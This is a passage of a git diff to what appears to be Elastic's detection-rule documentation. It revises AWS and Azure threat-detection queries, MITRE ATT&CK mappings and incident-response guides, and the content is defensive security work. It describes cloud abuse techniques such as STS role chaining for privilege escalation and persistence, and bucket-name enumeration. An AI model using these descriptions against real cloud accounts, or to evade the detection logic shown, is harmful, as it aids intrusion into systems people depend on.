+- **Notify owners.** Inform the bucket/application owner and security lead; confirm any maintenance windows. + +**2. Containment options** +- **External-origin spikes:** Verify Block Public Access is enforced and bucket policies are locked down. Optionally apply a temporary deny-all bucket policy allowing only IR/admin roles while scoping. +- **Internal-origin spikes:** Identify the principal. Rotate access keys for IAM users, or restrict involved roles (temporary deny/SCP, remove risky policies). Pause broken jobs/pipelines until validated. + +**3. Scope & hunting** +- Review Timeline and CloudTrail for related events: `PutBucketPolicy`, `PutPublicAccessBlock`, `PutBucketVersioning`, lifecycle changes, unusual `PutObject`/`DeleteObject` volumes, or cross-account access. +- Check GuardDuty S3 and Config drift findings for signs of tampering or lateral movement. + +**4. Recovery & hardening** +- If data impact suspected: with Versioning, restore known-good versions; otherwise, recover from backups/replicas. +- Enable Versioning on critical buckets going forward; evaluate Object Lock legal hold if enabled. +- Ensure Block Public Access, least-privilege IAM policies, CloudTrail data events for S3, and GuardDuty protections are consistently enforced. + + +*Additional information* + +- https://docs.aws.amazon.com/AmazonS3/latest/userguide/ErrorCodeBilling.html[AWS S3 billing for error responses]: see latest AWS docs on which error codes are billed. +- https://aws.amazon.com/about-aws/whats-new/2024/05/amazon-s3-no-charge-http-error-codes/[AWS announcement (Aug 2024)]: 403s from outside the account/org are not billed. +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned template for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and bucket-level abuse. ==== Rule query @@ -110,30 +117,10 @@ Attackers may attempt to enumerate names until a valid bucket is discovered and [source, js] ---------------------------------- -from logs-aws.cloudtrail* - -| where - event.provider == "s3.amazonaws.com" - and aws.cloudtrail.error_code == "AccessDenied" - and tls.client.server_name is not null - and cloud.account.id is not null - -// keep only relevant ECS fields -| keep - tls.client.server_name, - source.address, - cloud.account.id - -// count access denied requests per server_name, source, and account -| stats - Esql.event_count = count(*) - by - tls.client.server_name, - source.address, - cloud.account.id - -// Threshold: more than 40 denied requests -| where Esql.event_count > 40 + event.dataset: "aws.cloudtrail" and + event.provider : "s3.amazonaws.com" and + aws.cloudtrail.error_code : "AccessDenied" and + tls.client.server_name : * ---------------------------------- @@ -152,9 +139,9 @@ from logs-aws.cloudtrail* ** ID: TA0007 ** Reference URL: https://attack.mitre.org/tactics/TA0007/ * Technique: -** Name: Cloud Infrastructure Discovery -** ID: T1580 -** Reference URL: https://attack.mitre.org/techniques/T1580/ +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ * Tactic: ** Name: Collection ** ID: TA0009 diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc index 646e012586..167c743a00 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-static-site-javascript-file-uploaded.asciidoc @@ -34,7 +34,7 @@ This rule detects when a JavaScript file is uploaded or accessed in an S3 static * Use Case: Cloud Threat Detection * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -115,7 +115,7 @@ from logs-aws.cloudtrail* metadata _id, _version, _index "%{{?bucket.name.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_name}, %{?host.key}=%{Esql_priv.aws_cloudtrail_request_parameters_host}, %{?bucket.object.location.key}=%{Esql.aws_cloudtrail_request_parameters_bucket_object_location}}" // Extract file name portion from full object path -| dissect Esql.aws_cloudtrail_request_parameters_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" +| dissect Esql.aws_cloudtrail_request_parameters_bucket_object_location "%{}static/js/%{Esql.aws_cloudtrail_request_parameters_object_key}" // Match on JavaScript files | where ends_with(Esql.aws_cloudtrail_request_parameters_object_key, ".js") diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc index a8f1f3d67b..04dee9d385 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sts-role-chaining.asciidoc @@ -1,11 +1,14 @@ [[aws-sts-role-chaining]] === AWS STS Role Chaining -Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This rule looks for role chaining activity happening within a single account, to eliminate false positives produced by common cross-account behavior. +Identifies role chaining activity. Role chaining is when you use one assumed role to assume a second role through the AWS CLI or API. While this a recognized functionality in AWS, role chaining can be abused for privilege escalation if the subsequent assumed role provides additional privileges. Role chaining can also be used as a persistence mechanism as each AssumeRole action results in a refreshed session token with a 1 hour maximum duration. This is a new terms rule that looks for the first occurance of one role (aws.cloudtrail.user_identity.session_context.session_issuer.arn) assuming another (aws.cloudtrail.resources.arn). -*Rule type*: esql +*Rule type*: new_terms -*Rule indices*: None +*Rule indices*: + +* filebeat-* +* logs-aws.cloudtrail-* *Severity*: medium @@ -35,7 +38,7 @@ Identifies role chaining activity. Role chaining is when you use one assumed rol * Tactic: Lateral Movement * Resources: Investigation Guide -*Version*: 2 +*Version*: 3 *Rule authors*: @@ -58,40 +61,57 @@ Identifies role chaining activity. Role chaining is when you use one assumed rol *Investigating AWS STS Role Chaining* -AWS Security Token Service (STS) allows temporary, limited-privilege credentials for AWS resources. Role chaining involves using one temporary role to assume another, potentially escalating privileges. Adversaries exploit this by gaining elevated access or persistence. The detection rule identifies such activity by monitoring specific API calls and access patterns within a single account, flagging potential misuse. +Role chaining occurs when a role assumed with temporary credentials (`AssumeRole`) is used to assume another role. While supported by AWS, chaining can increase risk of Privilege escalation, if the second role grants broader permissions; and Persistence, since each chained AssumeRole refreshes the session with up to 1-hour duration. This new terms rule triggers on the first observed combination of one role (`aws.cloudtrail.user_identity.session_context.session_issuer.arn`) assuming another (`aws.cloudtrail.resources.arn`). *Possible investigation steps* -- Review the AWS CloudTrail logs to identify the source of the AssumeRole API call by examining the aws.cloudtrail.user_identity.arn field to determine which user or service initiated the role chaining. -- Check the cloud.region field to understand the geographical context of the activity and assess if it aligns with expected operational regions for your organization. -- Investigate the aws.cloudtrail.resources.account_id and aws.cloudtrail.recipient_account_id fields to confirm that the role chaining activity occurred within the same account, as cross-account role chaining is not flagged by this rule. -- Analyze the aws.cloudtrail.user_identity.access_key_id to verify that the access key used is a temporary token starting with "ASIA", indicating the use of temporary credentials. -- Assess the permissions associated with the roles involved in the chaining to determine if the subsequent role provides elevated privileges that could be exploited for privilege escalation or persistence. -- Correlate the timing of the AssumeRole events with other security events or alerts to identify any suspicious patterns or activities that may indicate malicious intent. +- **Review Alert Context**: Investigate the alert, focusing on `aws.cloudtrail.user_identity.session_context.session_issuer.arn` (the calling role) and `aws.cloudtrail.resources.arn` (the target role). +- **Determine scope and intent.** Check `aws.cloudtrail.recipient_account_id` and `aws.cloudtrail.resources.account_id` fields to identify whether the chaining is Intra-account (within the same AWS account) or Cross-account (from another AWS account). +- **Check role privileges.** Compare policies of the calling and target roles. Determine if chaining increases permissions (for example, access to S3 data, IAM modifications, or admin privileges). +- **Correlate with other activity.** Look for related alerts or CloudTrail activity within ±30 minutes: policy changes, unusual S3 access, or use of sensitive APIs. Use `aws.cloudtrail.user_identity.arn` to track behavior from the same role session, use `aws.cloudtrail.user_identity.session_context.session_issuer.arn` to track broader behavior from the role itself. +- **Validate legitimacy.** Contact the account or service owner to confirm if the chaining was expected (for example, automation pipelines or federated access flows). +- **Geography & source.** Review `cloud.region`, `source.address`, and other `geo` fields to assess if the activity originates from expected regions or network ranges. *False positive analysis* -- Cross-account role assumptions are common in many AWS environments and can generate false positives. To mitigate this, ensure the rule is configured to only monitor role chaining within a single account, as specified in the rule description. -- Automated processes or applications that frequently assume roles for legitimate purposes may trigger false positives. Identify these processes and create exceptions for their specific access patterns or user identities. -- Scheduled tasks or scripts that use temporary credentials for routine operations might be flagged. Review these tasks and whitelist their access key IDs if they consistently follow a predictable and secure pattern. -- Development and testing environments often involve frequent role assumptions for testing purposes. Exclude these environments from monitoring or adjust the rule to account for their unique access behaviors. -- Regularly review and update the list of exceptions to ensure that only non-threatening behaviors are excluded, maintaining the effectiveness of the detection rule. +- **Expected role chaining.** Some organizations use role chaining as part of multi-account access strategies. Maintain an allowlist of known `issuer.arn` - `target.arn` pairs. +- **Automation and scheduled tasks.** CI/CD systems or monitoring tools may assume roles frequently. Validate by `userAgent` and historical behavior. +- **Test/dev environments.** Development accounts may generate experimental chaining patterns. Tune rules or exceptions to exclude low-risk accounts. *Response and remediation* -- Immediately revoke the temporary credentials associated with the detected AssumeRole activity to prevent further unauthorized access. -- Conduct a thorough review of the AWS CloudTrail logs to identify any additional suspicious activities or roles assumed using the compromised credentials. -- Isolate the affected AWS resources and accounts to prevent lateral movement and further privilege escalation within the environment. -- Notify the security team and relevant stakeholders about the incident for awareness and further investigation. -- Implement stricter IAM policies and role permissions to limit the ability to assume roles unnecessarily, reducing the risk of privilege escalation. -- Enhance monitoring and alerting for AssumeRole activities, especially those involving temporary credentials, to detect similar threats in the future. -- Conduct a post-incident review to identify gaps in security controls and update incident response plans to improve future response efforts. +**1. Immediate steps** +- **Preserve evidence.** Export triggering CloudTrail events (±30 minutes) into a restricted evidence bucket. Include session context, source IP, and user agent. +- **Notify owners.** Contact the owners of both roles to validate intent. + +**2. Containment (if suspicious)** +- **Revoke temporary credentials.** https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_revoke-sessions.html[Revoke Session Permissions] if possible, or attach https://docs.aws.amazon.com/aws-managed-policy/latest/reference/AWSDenyAll.html[AWSDenyALL policy] to the originating role. +- **Restrict risky roles.** Apply least-privilege policies or temporarily deny `sts:AssumeRole` for suspicious principals. +- **Enable monitoring.** Ensure CloudTrail and GuardDuty are active in all regions to detect further chaining. + +**3. Scope and hunt** +- Search for additional AssumeRole activity by the same `issuer.arn` or `resources.arn` across other accounts and regions. +- Look for privilege escalation attempts (for example, IAM `AttachRolePolicy`, `UpdateAssumeRolePolicy`) or sensitive data access following the chain. + +**4. Recovery & hardening** +- Apply least privilege to all roles, limiting trust policies to only required principals. +- Enforce MFA where possible on AssumeRole operations. +- Periodically review role chaining patterns to validate necessity; remove unused or risky trust relationships. +- Document and tune new terms exceptions for known, legitimate chains. + + +*Additional information* + + +- https://github.com/aws-samples/aws-incident-response-playbooks/[AWS IR Playbooks]: NIST-aligned templates for evidence, containment, eradication, recovery, post-incident. +- https://github.com/aws-samples/aws-customer-playbook-framework/[AWS Customer Playbook Framework]: Practical response steps for account and IAM misuse scenarios +- AWS IAM Best Practices: https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html[AWS docs] for reducing risk from temporary credentials. ==== Setup @@ -103,13 +123,11 @@ The AWS Fleet integration, Filebeat module, or similarly structured data is requ [source, js] ---------------------------------- -from logs-aws.cloudtrail-* metadata _id, _version, _index - -// filter for AssumeRole API calls where access key id is a short term token beginning with ASIA -| where event.dataset == "aws.cloudtrail" and event.provider == "sts.amazonaws.com" and event.action == "AssumeRole" and aws.cloudtrail.resources.account_id == aws.cloudtrail.recipient_account_id and aws.cloudtrail.user_identity.access_key_id like "ASIA*" - -// keep only the relevant fields -| keep aws.cloudtrail.user_identity.arn, cloud.region, aws.cloudtrail.resources.account_id, aws.cloudtrail.recipient_account_id, aws.cloudtrail.user_identity.access_key_id + event.dataset : "aws.cloudtrail" and + event.provider : "sts.amazonaws.com" and + event.action : "AssumeRole" and + aws.cloudtrail.user_identity.type : "AssumedRole" and + event.outcome : "success" ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc index ebf0981d53..03d5453824 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-high-risk-user-sign-in-heuristic.asciidoc @@ -7,8 +7,8 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof *Rule indices*: +* logs-azure.signinlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies high risk Azure Active Directory (AD) sign-ins by leveraging Microsof * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -122,3 +122,7 @@ event.dataset:azure.signinlogs and ** Name: Valid Accounts ** ID: T1078 ** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc index fb2a2b057c..c62ef42197 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-active-directory-powershell-sign-in.asciidoc @@ -7,8 +7,8 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. PowerSh *Rule indices*: +* logs-azure.signinlogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. PowerSh *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies a sign-in using the Azure Active Directory PowerShell module. PowerSh * Resources: Investigation Guide * Tactic: Initial Access -*Version*: 107 +*Version*: 108 *Rule authors*: @@ -124,3 +124,15 @@ event.dataset:azure.signinlogs and ** Name: Cloud Accounts ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc index 8319aa28dd..7edae5acd5 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-alert-suppression-rule-created-or-modified.asciidoc @@ -7,8 +7,8 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -33,7 +33,7 @@ Identifies the creation of suppression rules in Azure. Suppression rules are a m * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc index c9f02ba387..3697ad4058 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-application-credential-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when a new credential is added to an application in Azure. An applica *Rule indices*: +* logs-azure.auditlogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when a new credential is added to an application in Azure. An applica *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -29,10 +29,10 @@ Identifies when a new credential is added to an application in Azure. An applica * Domain: Cloud * Data Source: Azure * Use Case: Identity and Access Audit -* Tactic: Defense Evasion +* Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -107,14 +107,14 @@ event.dataset:azure.auditlogs and azure.auditlogs.operation_name:"Update applica *Framework*: MITRE ATT&CK^TM^ * Tactic: -** Name: Defense Evasion -** ID: TA0005 -** Reference URL: https://attack.mitre.org/tactics/TA0005/ +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ * Technique: -** Name: Use Alternate Authentication Material -** ID: T1550 -** Reference URL: https://attack.mitre.org/techniques/T1550/ +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ * Sub-technique: -** Name: Application Access Token -** ID: T1550.001 -** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +** Name: Additional Cloud Credentials +** ID: T1098.001 +** Reference URL: https://attack.mitre.org/techniques/T1098/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc index 991cd60008..93b4f9f9fb 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-account-created.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation account is created. Azure Automation account *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation account is created. Azure Automation account *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation account is created. Azure Automation account * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc index 09ca28658f..75af850b6a 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-created-or-modified.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation runbook is created or modified. An adversary *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation runbook is created or modified. An adversary *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,10 +32,10 @@ Identifies when an Azure Automation runbook is created or modified. An adversary * Domain: Cloud * Data Source: Azure * Use Case: Configuration Audit -* Tactic: Persistence +* Tactic: Execution * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,3 +113,14 @@ event.dataset:azure.activitylogs and event.outcome:(Success or success) ---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Serverless Execution +** ID: T1648 +** Reference URL: https://attack.mitre.org/techniques/T1648/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc index 6464602ff7..d0e2346d79 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-runbook-deleted.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation runbook is deleted. An adversary may delete * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc index 9bd7d47802..af56f67e2f 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-automation-webhook-created.asciidoc @@ -7,8 +7,8 @@ Identifies when an Azure Automation webhook is created. Azure Automation runbook *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies when an Azure Automation webhook is created. Azure Automation runbook *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -35,7 +35,7 @@ Identifies when an Azure Automation webhook is created. Azure Automation runbook * Tactic: Persistence * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -111,3 +111,22 @@ event.dataset:azure.activitylogs and event.outcome:(Success or success) ---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc index 6af27ad6f8..873406caaa 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-blob-container-access-level-modification.asciidoc @@ -7,8 +7,8 @@ Identifies changes to container access levels in Azure. Anonymous public read ac *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: low @@ -16,7 +16,7 @@ Identifies changes to container access levels in Azure. Anonymous public read ac *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies changes to container access levels in Azure. Anonymous public read ac * Tactic: Discovery * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -110,14 +110,22 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0007 ** Reference URL: https://attack.mitre.org/tactics/TA0007/ * Technique: -** Name: Cloud Service Discovery -** ID: T1526 -** Reference URL: https://attack.mitre.org/techniques/T1526/ +** Name: Cloud Storage Object Discovery +** ID: T1619 +** Reference URL: https://attack.mitre.org/techniques/T1619/ * Tactic: -** Name: Initial Access -** ID: TA0001 -** Reference URL: https://attack.mitre.org/tactics/TA0001/ +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ * Technique: -** Name: Exploit Public-Facing Application -** ID: T1190 -** Reference URL: https://attack.mitre.org/techniques/T1190/ +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Transfer Data to Cloud Account +** ID: T1537 +** Reference URL: https://attack.mitre.org/techniques/T1537/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc index 3b4e5651d8..762150e6d7 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-blob-permissions-modification.asciidoc @@ -7,8 +7,8 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are *Runs every*: 5m -*Searches indices from*: None ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -32,7 +32,7 @@ Identifies when the Azure role-based access control (Azure RBAC) permissions are * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 107 +*Version*: 108 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc index 68dcd37b30..3050db28d9 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-command-execution-on-virtual-machine.asciidoc @@ -7,8 +7,8 @@ Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machi *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machi *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -34,7 +34,7 @@ Identifies command execution on a virtual machine (VM) in Azure. A Virtual Machi * Tactic: Execution * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -113,6 +113,6 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** ID: TA0002 ** Reference URL: https://attack.mitre.org/tactics/TA0002/ * Technique: -** Name: Command and Scripting Interpreter -** ID: T1059 -** Reference URL: https://attack.mitre.org/techniques/T1059/ +** Name: Cloud Administration Command +** ID: T1651 +** Reference URL: https://attack.mitre.org/techniques/T1651/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc index 4730d63fa4..fadc8e3a1f 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-diagnostic-settings-deletion.asciidoc @@ -7,8 +7,8 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log *Rule indices*: +* logs-azure.activitylogs-* * filebeat-* -* logs-azure* *Severity*: medium @@ -16,7 +16,7 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log *Runs every*: 5m -*Searches indices from*: now-25m ({ref}/common-options.html#date-math[Date Math format], see also <>) +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) *Maximum alerts per execution*: 100 @@ -31,7 +31,7 @@ Identifies the deletion of diagnostic settings in Azure, which send platform log * Tactic: Defense Evasion * Resources: Investigation Guide -*Version*: 105 +*Version*: 106 *Rule authors*: @@ -117,3 +117,7 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF ** Name: Disable or Modify Tools ** ID: T1562.001 ** Reference URL: https://attack.mitre.org/techniques/T1562/001/ +* Sub-technique: +** Name: Disable or Modify Cloud Logs +** ID: T1562.008 +** Reference URL: https://attack.mitre.org/techniques/T1562/008/ diff --git a/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc b/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc index a8a5a7e9cc..87cf1e1303 100644 --- a/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/azure-entra-id-rare-app-id-for-principal-authentication.asciidoc @@ -8,7 +8,7 @@ Identifies rare Azure Entra ID apps IDs requesting authentication on-behalf-of a *Rule indices*: * filebeat-* -* logs-azure* +* 